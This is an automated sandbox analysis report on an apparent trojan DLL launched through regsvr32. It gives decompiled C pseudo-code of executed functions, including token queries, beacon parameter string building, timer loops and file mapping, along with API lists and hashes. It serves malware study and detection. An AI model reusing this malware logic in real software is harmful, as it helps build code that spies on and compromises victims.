                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: 9f246d461adaf4514cb0917dfd0fa3d8253c62feb032a527f2e28114bd9e391e
                                                          • Instruction ID: eaf3e03c324597457680a80c0e1d7163ead9b982ad7730703ec05be86e67c7e8
                                                          • Opcode Fuzzy Hash: 9f246d461adaf4514cb0917dfd0fa3d8253c62feb032a527f2e28114bd9e391e
                                                          • Instruction Fuzzy Hash: 6AE09B73501261A74715ABE55C8CC5FBFBDFF997517040417F780D7110C721D90697A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Analysis Process: regsvr32.exe PID: 3484 Parent PID: 1112 regsvr32.exeCOMMON

                                                          Executed Functions

                                                          Function 047F5A27, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E047F5A27(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E047FA71F(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E047FA734(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                          0x047f5a34
                                                          0x047f5a35
                                                          0x047f5a36
                                                          0x047f5a37
                                                          0x047f5a38
                                                          0x047f5a3c
                                                          0x047f5a43
                                                          0x047f5a52
                                                          0x047f5a55
                                                          0x047f5a58
                                                          0x047f5a5f
                                                          0x047f5a62
                                                          0x047f5a65
                                                          0x047f5a68
                                                          0x047f5a6b
                                                          0x047f5a76
                                                          0x047f5a78
                                                          0x047f5a81
                                                          0x047f5a89
                                                          0x047f5a8b
                                                          0x047f5a9d
                                                          0x047f5aa7
                                                          0x047f5aab
                                                          0x047f5aba
                                                          0x047f5abe
                                                          0x047f5ac7
                                                          0x047f5acf
                                                          0x047f5acf
                                                          0x047f5ad1
                                                          0x047f5ad1
                                                          0x047f5ad9
                                                          0x047f5adf
                                                          0x047f5ae3
                                                          0x047f5ae3
                                                          0x047f5aee

                                                          APIs
                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 047F5A6E
                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 047F5A81
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 047F5A9D
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 047F5ABA
                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 047F5AC7
                                                          • NtClose.NTDLL(?), ref: 047F5AD9
                                                          • NtClose.NTDLL(00000000), ref: 047F5AE3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: 5a843bb359871757a8973da8da85876174df965d5e0e403da48b92f01a821aca
                                                          • Instruction ID: b5fff42e377b19be81435a7d0406d2479bbc69c2d17ab4475e767052e6d8f3dd
                                                          • Opcode Fuzzy Hash: 5a843bb359871757a8973da8da85876174df965d5e0e403da48b92f01a821aca
                                                          • Instruction Fuzzy Hash: 6921E3B290021CBFDB11AF95CC85EDEBFBDFB08750F108026FA05E6210D7759A559BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F4AB6, Relevance: 33.2, APIs: 22, Instructions: 244memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E047F4AB6(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x47fd018; // 0xf1c1aee9
				asm("bswap eax");
				_t61 =  *0x47fd014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x47fd010; // 0xd8d2f808
				asm("bswap eax");
				_t63 = E047FD00C; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0x47fd2a8; // 0xaea5a8
				_t3 = _t64 + 0x47fe633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d15e, _t63, _t62, _t61, _t60,  *0x47fd02c,  *0x47fd004, _t59);
				_t67 = E047F56CD();
				_t68 =  *0x47fd2a8; // 0xaea5a8
				_t4 = _t68 + 0x47fe673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71; // executed
				_t72 = E047F58DB(_t134); // executed
				_t133 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x47fd2a8; // 0xaea5a8
					_t7 = _t126 + 0x47fe8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x47fd238, 0, _v8);
				}
				_t73 = E047FA199();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x47fd2a8; // 0xaea5a8
					_t11 = _t121 + 0x47fe8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x47fd238, 0, _v8);
				}
				_t146 =  *0x47fd32c; // 0x52e95b0
				_t75 = E047F4622(0x47fd00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					RtlFreeHeap( *0x47fd238, _t152, _a16); // executed
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x47fd238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x47fd238, _t152, _v20);
						goto L26;
					}
					E047F518F(GetTickCount());
					_t82 =  *0x47fd32c; // 0x52e95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x47fd32c; // 0x52e95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x47fd32c; // 0x52e95b0
					_t148 = E047F1BB6(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x47fd238, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x47fc28c);
					_push(_t148);
					_t94 = E047F361A();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x47fd238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E047F9070( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E047F6761();
						L22:
						HeapFree( *0x47fd238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E047F69B4(_t133, 0xffffffffffffffff, _t148,  &_v24); // executed
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_t111 = E047F391F(_t157, _a4, _a8, _a12); // executed
						_v12 = _t111;
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E047FA734(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E047F5800(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E047FA734(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}






















































                                                          0x047f4ab6
                                                          0x047f4ab6
                                                          0x047f4ab6
                                                          0x047f4abf
                                                          0x047f4ac8
                                                          0x047f4aca
                                                          0x047f4aca
                                                          0x047f4ad7
                                                          0x047f4ae2
                                                          0x047f4ae5
                                                          0x047f4aea
                                                          0x047f4af3
                                                          0x047f4af6
                                                          0x047f4afb
                                                          0x047f4afe
                                                          0x047f4b03
                                                          0x047f4b06
                                                          0x047f4b12
                                                          0x047f4b1f
                                                          0x047f4b21
                                                          0x047f4b27
                                                          0x047f4b2c
                                                          0x047f4b37
                                                          0x047f4b39
                                                          0x047f4b3c
                                                          0x047f4b3e
                                                          0x047f4b43
                                                          0x047f4b49
                                                          0x047f4b4e
                                                          0x047f4b51
                                                          0x047f4b56
                                                          0x047f4b63
                                                          0x047f4b65
                                                          0x047f4b6b
                                                          0x047f4b75
                                                          0x047f4b75
                                                          0x047f4b77
                                                          0x047f4b7c
                                                          0x047f4b81
                                                          0x047f4b84
                                                          0x047f4b89
                                                          0x047f4b96
                                                          0x047f4b98
                                                          0x047f4ba6
                                                          0x047f4ba6
                                                          0x047f4ba8
                                                          0x047f4bb6
                                                          0x047f4bbb
                                                          0x047f4bbd
                                                          0x047f4bc2
                                                          0x047f4d83
                                                          0x047f4d8d
                                                          0x047f4d96
                                                          0x047f4bc8
                                                          0x047f4bd4
                                                          0x047f4bda
                                                          0x047f4bdf
                                                          0x047f4d77
                                                          0x047f4d81
                                                          0x00000000
                                                          0x047f4d81
                                                          0x047f4beb
                                                          0x047f4bf0
                                                          0x047f4bf9
                                                          0x047f4c0a
                                                          0x047f4c0e
                                                          0x047f4c17
                                                          0x047f4c1d
                                                          0x047f4c2c
                                                          0x047f4c33
                                                          0x047f4c3c
                                                          0x047f4c42
                                                          0x047f4d6b
                                                          0x047f4d75
                                                          0x00000000
                                                          0x047f4d75
                                                          0x047f4c4e
                                                          0x047f4c54
                                                          0x047f4c55
                                                          0x047f4c5a
                                                          0x047f4c5f
                                                          0x047f4d61
                                                          0x047f4d69
                                                          0x00000000
                                                          0x047f4d69
                                                          0x047f4c68
                                                          0x047f4c6f
                                                          0x047f4c77
                                                          0x047f4c7c
                                                          0x047f4c85
                                                          0x047f4c90
                                                          0x047f4c95
                                                          0x047f4c9a
                                                          0x047f4d99
                                                          0x047f4d4d
                                                          0x047f4d4d
                                                          0x047f4d52
                                                          0x047f4d5d
                                                          0x047f4d5f
                                                          0x00000000
                                                          0x047f4d5f
                                                          0x047f4ca4
                                                          0x047f4ca9
                                                          0x047f4cae
                                                          0x047f4cb3
                                                          0x047f4cbe
                                                          0x047f4cc3
                                                          0x047f4cc6
                                                          0x047f4ccc
                                                          0x047f4cd2
                                                          0x047f4cd8
                                                          0x047f4cdb
                                                          0x047f4ce1
                                                          0x047f4ce4
                                                          0x047f4ce9
                                                          0x047f4ced
                                                          0x047f4ced
                                                          0x047f4cf9
                                                          0x047f4d05
                                                          0x047f4d09
                                                          0x047f4d0b
                                                          0x047f4d10
                                                          0x047f4d12
                                                          0x047f4d17
                                                          0x047f4d1c
                                                          0x047f4d29
                                                          0x047f4d31
                                                          0x047f4d34
                                                          0x047f4d34
                                                          0x047f4d10
                                                          0x00000000
                                                          0x047f4cfb
                                                          0x047f4cff
                                                          0x047f4d36
                                                          0x047f4d39
                                                          0x047f4d42
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x047f4d42
                                                          0x047f4d01
                                                          0x00000000
                                                          0x047f4d01
                                                          0x047f4cf9

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 047F4ACA
                                                          • wsprintfA.USER32 ref: 047F4B1A
                                                          • wsprintfA.USER32 ref: 047F4B37
                                                          • wsprintfA.USER32 ref: 047F4B63
                                                          • HeapFree.KERNEL32(00000000,?), ref: 047F4B75
                                                          • wsprintfA.USER32 ref: 047F4B96
                                                          • HeapFree.KERNEL32(00000000,?), ref: 047F4BA6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047F4BD4
                                                          • GetTickCount.KERNEL32 ref: 047F4BE5
                                                          • RtlEnterCriticalSection.NTDLL(052E9570), ref: 047F4BF9
                                                          • RtlLeaveCriticalSection.NTDLL(052E9570), ref: 047F4C17
                                                            • Part of subcall function 047F1BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,047F20C2,?,052E95B0), ref: 047F1BE1
                                                            • Part of subcall function 047F1BB6: lstrlen.KERNEL32(?,?,?,047F20C2,?,052E95B0), ref: 047F1BE9
                                                            • Part of subcall function 047F1BB6: strcpy.NTDLL ref: 047F1C00
                                                            • Part of subcall function 047F1BB6: lstrcat.KERNEL32(00000000,?), ref: 047F1C0B
                                                            • Part of subcall function 047F1BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,047F20C2,?,052E95B0), ref: 047F1C28
                                                          • StrTrimA.SHLWAPI(00000000,047FC28C,?,052E95B0), ref: 047F4C4E
                                                            • Part of subcall function 047F361A: lstrlen.KERNEL32(052E9A78,00000000,00000000,7742C740,047F20ED,00000000), ref: 047F362A
                                                            • Part of subcall function 047F361A: lstrlen.KERNEL32(?), ref: 047F3632
                                                            • Part of subcall function 047F361A: lstrcpy.KERNEL32(00000000,052E9A78), ref: 047F3646
                                                            • Part of subcall function 047F361A: lstrcat.KERNEL32(00000000,?), ref: 047F3651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 047F4C6F
                                                          • lstrcpy.KERNEL32(?,?), ref: 047F4C77
                                                          • lstrcat.KERNEL32(?,?), ref: 047F4C85
                                                          • lstrcat.KERNEL32(?,00000000), ref: 047F4C8B
                                                            • Part of subcall function 047F9070: lstrlen.KERNEL32(?,00000000,052E9A98,00000000,047F8808,052E9C76,?,?,?,?,?,63699BC3,00000005,047FD00C), ref: 047F9077
                                                            • Part of subcall function 047F9070: mbstowcs.NTDLL ref: 047F90A0
                                                            • Part of subcall function 047F9070: memset.NTDLL ref: 047F90B2
                                                          • wcstombs.NTDLL ref: 047F4D1C
                                                            • Part of subcall function 047F391F: SysAllocString.OLEAUT32(?), ref: 047F395A
                                                            • Part of subcall function 047F391F: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 047F39DD
                                                            • Part of subcall function 047FA734: HeapFree.KERNEL32(00000000,00000000,047F5637,00000000,?,?,00000000), ref: 047FA740
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 047F4D5D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 047F4D69
                                                          • HeapFree.KERNEL32(00000000,?,?,052E95B0), ref: 047F4D75
                                                          • HeapFree.KERNEL32(00000000,?), ref: 047F4D81
                                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 047F4D8D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                          • String ID:
                                                          • API String ID: 603507560-0
                                                          • Opcode ID: a2af8ae2893eba7f390efea0cc08ecbc25ec8e095bfa64bf295f7d04ece41c3f
                                                          • Instruction ID: 6f9e19f859380fe8aa60d280b47915e70780ed088218c36f023b532e84de8560
                                                          • Opcode Fuzzy Hash: a2af8ae2893eba7f390efea0cc08ecbc25ec8e095bfa64bf295f7d04ece41c3f
                                                          • Instruction Fuzzy Hash: EA91F671900108BFDB21EFA8DD88AAE7BB9EF48314F148454EA05D7360DB39AD51DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F51B0, Relevance: 16.6, APIs: 11, Instructions: 150timememoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 83%
                                                          			E047F51B0(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x47fd240);
					_v20 = 0;
					_v16 = 0;
					L047FAF2E();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x47fd26c; // 0x2c8
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x47fd24c = 5;
						} else {
							_t68 = E047F8D14(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x47fd260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E047FA376(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E047F36B1(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x47fd244);
							goto L21;
						} else {
							__eflags =  *0x47fd248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E047F6761();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x47fd248);
								L21:
								L047FAF2E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x47fd238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                          0x047f51b0
                                                          0x047f51c2
                                                          0x047f51c5
                                                          0x047f51d1
                                                          0x047f51d7
                                                          0x047f51dc
                                                          0x047f5343
                                                          0x047f51e2
                                                          0x047f51e2
                                                          0x047f51e4
                                                          0x047f51e9
                                                          0x047f51ea
                                                          0x047f51f0
                                                          0x047f51f3
                                                          0x047f51f6
                                                          0x047f5204
                                                          0x047f520f
                                                          0x047f5212
                                                          0x047f5214
                                                          0x047f5221
                                                          0x047f522b
                                                          0x047f522d
                                                          0x047f5232
                                                          0x047f5237
                                                          0x047f5242
                                                          0x047f5242
                                                          0x047f5239
                                                          0x047f5239
                                                          0x047f5240
                                                          0x00000000
                                                          0x00000000
                                                          0x047f5240
                                                          0x047f524c
                                                          0x00000000
                                                          0x047f524f
                                                          0x047f5253
                                                          0x047f525e
                                                          0x047f525e
                                                          0x047f5265
                                                          0x047f526e
                                                          0x047f5275
                                                          0x047f527e
                                                          0x047f5281
                                                          0x047f5284
                                                          0x047f5289
                                                          0x047f528e
                                                          0x00000000
                                                          0x00000000
                                                          0x047f5290
                                                          0x047f5293
                                                          0x047f5296
                                                          0x047f5299
                                                          0x00000000
                                                          0x047f529b
                                                          0x047f52aa
                                                          0x047f52aa
                                                          0x00000000
                                                          0x047f52d8
                                                          0x047f52d8
                                                          0x047f52dd
                                                          0x047f52fc
                                                          0x047f52fe
                                                          0x047f5303
                                                          0x047f5304
                                                          0x00000000
                                                          0x047f52df
                                                          0x047f52df
                                                          0x047f52e5
                                                          0x00000000
                                                          0x047f52e7
                                                          0x047f52e7
                                                          0x047f52ec
                                                          0x047f52ee
                                                          0x047f52f3
                                                          0x047f52f4
                                                          0x047f530a
                                                          0x047f530a
                                                          0x047f5312
                                                          0x047f531d
                                                          0x047f5320
                                                          0x047f532b
                                                          0x047f532d
                                                          0x047f5330
                                                          0x047f5332
                                                          0x00000000
                                                          0x047f5338
                                                          0x00000000
                                                          0x047f5338
                                                          0x047f5332
                                                          0x047f52e5
                                                          0x00000000
                                                          0x047f52dd
                                                          0x047f52ad
                                                          0x047f52af
                                                          0x047f52b2
                                                          0x047f52b3
                                                          0x047f52b3
                                                          0x047f52b7
                                                          0x047f52c1
                                                          0x047f52c1
                                                          0x047f52c7
                                                          0x047f52ca
                                                          0x047f52ca
                                                          0x047f52d0
                                                          0x047f52d0
                                                          0x047f534d
                                                          0x00000000

                                                          APIs
                                                          • memset.NTDLL ref: 047F51C5
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 047F51D1
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 047F51F6
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 047F5212
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 047F522B
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047F52C1
                                                          • CloseHandle.KERNEL32(?), ref: 047F52D0
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 047F530A
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,047F5D5E,?), ref: 047F5320
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 047F532B
                                                            • Part of subcall function 047F8D14: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,052E9368,00000000,?,74B5F710,00000000,74B5F730), ref: 047F8D63
                                                            • Part of subcall function 047F8D14: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,052E93A0,?,00000000,30314549,00000014,004F0053,052E935C), ref: 047F8E00
                                                            • Part of subcall function 047F8D14: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,047F523E), ref: 047F8E12
                                                          • GetLastError.KERNEL32 ref: 047F533D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                          • String ID:
                                                          • API String ID: 3521023985-0
                                                          • Opcode ID: 3da0a6719b8f373e4b197f716edcaac3b0a56b8add96614c2952bb59b7ff031a
                                                          • Instruction ID: 6a1bfbdaf6d142dd8cb643da091ef4712565a441ac56035515f349ccdbcc938b
                                                          • Opcode Fuzzy Hash: 3da0a6719b8f373e4b197f716edcaac3b0a56b8add96614c2952bb59b7ff031a
                                                          • Instruction Fuzzy Hash: 82517FB1905228BFDF119FD5DD48DEEBFB8EF09724F204615E911A2341D774AA40DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F232F, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E047F232F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L047FAF28();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x47fd2a8; // 0xaea5a8
				_t5 = _t13 + 0x47fe87e; // 0x52e8e26
				_t6 = _t13 + 0x47fe59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L047FABCA();
				_t17 = CreateFileMappingW(0xffffffff, 0x47fd2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                          0x047f232f
                                                          0x047f2337
                                                          0x047f233b
                                                          0x047f2341
                                                          0x047f2346
                                                          0x047f234b
                                                          0x047f234e
                                                          0x047f2351
                                                          0x047f2356
                                                          0x047f2357
                                                          0x047f235a
                                                          0x047f235f
                                                          0x047f2366
                                                          0x047f2370
                                                          0x047f2372
                                                          0x047f2373
                                                          0x047f2376
                                                          0x047f2392
                                                          0x047f2398
                                                          0x047f239c
                                                          0x047f23ea
                                                          0x047f239e
                                                          0x047f23ab
                                                          0x047f23bb
                                                          0x047f23c3
                                                          0x047f23d5
                                                          0x047f23d9
                                                          0x00000000
                                                          0x00000000
                                                          0x047f23c5
                                                          0x047f23c8
                                                          0x047f23cd
                                                          0x047f23cf
                                                          0x047f23cf
                                                          0x047f23ad
                                                          0x047f23af
